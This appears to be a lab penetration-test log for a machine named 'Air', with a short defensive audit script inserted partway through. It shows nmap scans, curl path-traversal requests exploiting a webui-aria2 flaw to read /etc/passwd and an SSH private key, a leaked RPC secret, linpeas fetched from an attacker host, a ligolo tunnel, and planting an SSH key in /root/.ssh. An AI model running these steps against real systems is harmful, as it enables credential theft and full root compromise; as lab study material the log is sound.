Air

Pentest Log: 2025-07-22

Target Information

Enumeration

Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 192.168.157.100 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')

nmap -p$ports -sC -sV 192.168.157.100 -oN tcp_scan_result.txt

nmap -sU --top-ports 100 192.168.157.100 -oN udp_scan_result.txt

Port 22

ssh -i id_rsa deathflash@192.168.157.100

Port 8888

Web Content Enumeration

Searched for webui-aria2 exploits and found CVE-2023-39141 (LFI).

curl --path-as-is http://192.168.157.100:8888/../../../../../../../../../../../../../../../../../../../../etc/passwd

curl --path-as-is http://192.168.157.100:8888/../../../../../../../../../../../../../../../../../../../../home/deathflash/.ssh/authorized_keys

curl --path-as-is http://192.168.157.100:8888/../../../../../../../../../../../../../../../../../../../../home/deathflash/.ssh/id_rsa

Privilege Escalation

Current Access

Enumeration

Processes / Services:

ps aux

root is running aria2, but the rpc-secret value is masked in the process list, so we search for files whose names contain aria2 to locate a potential configuration file.

find / -iname 'aria2*' -type f 2>/dev/null

cat /etc/systemd/system/aria2.service

rpc-secret:mEHNghqcNiF3KV
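
A defensive check for the exposure found above, added here as an example that is not part of the original log: it flags systemd units that embed an aria2 RPC secret while being world-readable or running as root. The function name `audit_aria2_units` and the default directory are assumptions.

```bash
#!/bin/sh
# Added example (not from the original log): flag systemd units that expose
# an aria2 RPC secret. Function name and default directory are assumptions.

# Prints one tab-separated finding per line: <unit path> <issue>
audit_aria2_units() (
    dir="${1:-/etc/systemd/system}"
    for unit in "$dir"/*.service; do
        [ -f "$unit" ] || continue
        # Only units that embed the secret inline are of interest.
        grep -q -e 'rpc-secret' "$unit" || continue

        # -perm -004: the "other" read bit is set, so any local user
        # can read the secret straight out of the unit file.
        if [ -n "$(find "$unit" -prune -perm -004 -print)" ]; then
            printf '%s\tsecret readable by all local users\n' "$unit"
        fi

        # Heuristic: no User= line, or User=root, means the RPC daemon
        # runs as root, so the secret grants root-level file writes.
        if ! grep -q '^User=' "$unit" ||
           grep -q '^User=root[[:space:]]*$' "$unit"; then
            printf '%s\tRPC service runs as root\n' "$unit"
        fi
    done
)
```

Both findings are cleared by moving the secret into a configuration file with mode 600 that the unit references via `--conf-path`, and by setting `User=` to an unprivileged account.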

Linpeas:

wget http://192.168.45.163/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

Internal Ports

port 6800

sudo ip tuntap add user kali mode tun ligolo

sudo ip link set ligolo up

./agent -connect 192.168.45.163:11601 -ignore-cert

sudo ip route add 240.0.0.1/32 dev ligolo

start

Visit 240.0.0.1:8888 and update the secret field in the connection settings.

ssh-keygen -t rsa -b 4096 -f id_rsa

cat id_rsa.pub >> authorized_keys

chmod 600 authorized_keys

Download the authorized_keys file into the /root/.ssh folder, then SSH into the target machine using id_rsa.